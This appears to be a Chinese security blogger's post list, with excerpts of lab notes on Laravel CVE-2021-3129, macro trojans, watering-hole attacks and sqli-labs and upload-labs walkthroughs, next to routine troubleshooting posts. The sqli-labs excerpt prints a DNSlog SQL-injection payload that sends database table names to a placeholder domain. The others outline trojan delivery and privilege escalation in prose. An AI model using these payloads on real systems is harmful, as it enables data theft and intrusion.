- 博客(15)
- 收藏
- 关注
RSS订阅原创 复现CVE-2021-3129
CVE-2021-3129 是 Laravel 框架中的一个远程代码执行漏洞,当 Laravel 开启 Debug 模式时,由于 Laravel 自带的 Ignition 组件对。函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意 Log 文件等方式触发 Phar 反序列化,最终造成远程代码执行。www-data是服务用户,服务用户--------》普通用户--------》root超级管理员权限。下载CVE-2021-3129漏洞exp。利用exp远程下载木马并执行。查找可以提权的内核漏洞。
2024-11-07 17:51:02
587
原创 宏木马攻击
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。在一个局域网内的主机打开这个word,就能捕捉到这个肉机:last>60,不在线。生成了两个木马文件,点击即会受到攻击。可以对肉机进行进程监听,查看桌面,点击下面黑人,监听鼠标,Inject:注入监听。监听键盘,屏幕拍照,
2024-11-07 17:44:16
257
原创 sqli-labs通关笔记
id=1' and (select load_file(concat("//",(select table_name from information_schema.tables where table_schema = database() limit 3,1),".域名/123.txt")))--+要写为rand(0) 或者rand(4):rand()函数的执行速度要比 group by查询并插入key值的速度更快,只有rand(0)这个顺序可以导致在插入第三个数据,rand执行第五次时导致键值冲突。
2024-10-23 16:51:41
979
原创 复现水坑攻击
水坑攻击:在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并植入攻击代码,一旦攻击目标访问该网站就会“中招”。战术:实现钓鱼攻击下的水坑攻击,用户访问目标页后,释放木马,受害者运行木马程序后,从而获得目标的系统访问控制权限。工具: cs47、msf、shellter,内网穿透。由于不支持域名,所以需要解析服务器的IP地址。Ok,不要这个网站,克隆学校的mail。这个地址(kali)就是服务器的地址。
2024-10-23 16:41:55
180
原创 安装dnslog自动注入以及termcolor安装失败
一般kali自带python2,先安装pip,便于后面下载相关依赖模块。安装好后修改配置,配置好token和域名。第二个如果安装失败,可以直接下载好后安装。首先需要下载DnslogSqlinj。接下来需要安装两个模块。
2024-09-22 18:51:00
362
原创 upload-labs通关笔记
检查保存文件名,检查$_POST是否为空,若为空,则$file=$_FILES['upload_file']['name'];这些操作会将原本的制作好的图片马破坏,所以需要想办法绕过。根据传入的图片码和传入后进行处理过的图片码数据进行比对,找到没有被修改的字段,通过修改这些没有被修改过的字段,达到绕过图片重构的目的。这样$file[count($file) - 1]就等价于$file[2-1],值为空,保存的就是xx.php。2,上传一张图片,bp抓包修改内容,添加一句话木马,修改文件名为php后缀。
2024-07-31 20:43:13
797
原创 wordpress网站发现数据库连接不上( Error establishing a database connection)
进入wp docker修改wp-config.php文件。以下wp为wordoress容器名字。2、mysql IP地址改变了。1、查看mysql是否开启。刷新一下就可以进入了。
2024-03-31 00:59:06
569
1
原创 clone github项目时报错:error: RPC failed; curl 92 HTTP/2 stream 5 was not closed cleanly: CANCEL (err 8)
解决办法:增加缓存大小。
2024-02-29 00:35:34
2441
原创 burp安装后在kali中firefox浏览器代理(包含burp代理后firefox无法上网问题)
打开Firefox浏览器打开Settings>>General>>Networking Settings>>Settings,一般是代理没关:打开burp,Proxy->intercept->intercept is off,就可以正常上网了。intercept is off(关闭代理,可以正常上网)intercept is on(拦截请求)burp配置代理:查看代理默认监听端口为127.0.0.1:8080。点击 CA Certificate 下载证书。存到桌面或者你能找到的路径,配置证书。
2024-01-21 21:14:24
1449
原创 Ping不通:vmware上出现自动配置ipv4
netsh interface ipv4 set interface (指定网卡Idx) dadtransmits=0 store-persistent。输入:netsh interface ipv4 show inter (查看指定网卡Idx)由于电脑开启了自动配置ipv4功能,导致固定ip无法分配给电脑。所以我们需要禁用掉这个功能:Autoconfiguration。显示确定后,接着输入 net stop dhcp。(最后记得禁用后再次重启网卡,就不会出现了)
2023-11-08 23:41:31
927
2
原创 陇剑杯 jwt最全,超详细
首先我们要了解jwt验证,不知道jwt可以看这篇,大佬讲的非常详细总而言之jwt就是JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案jwt由点分为三部分,头部,负载,签名,我们需要找的就是签名ps:Header 和 Payload 串型化的算法是 Base64URLBase64URL与base64区别不大,Base64 有三个字符和被省略、替换成替换成。这就是 Base64URL 算法。
2023-07-29 12:05:04
317
原创 phpstudy8.1.1.3 解决mysql 服务打不开以及sqli-labs出现Server sent charset (255) unknown to the client.问题。
phpstudy8.1.1.3 解决mysql 服务打不开以及sqli-labs出现Server sent charset (255) unknown to the client.问题。
2023-02-05 14:45:02
1538
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人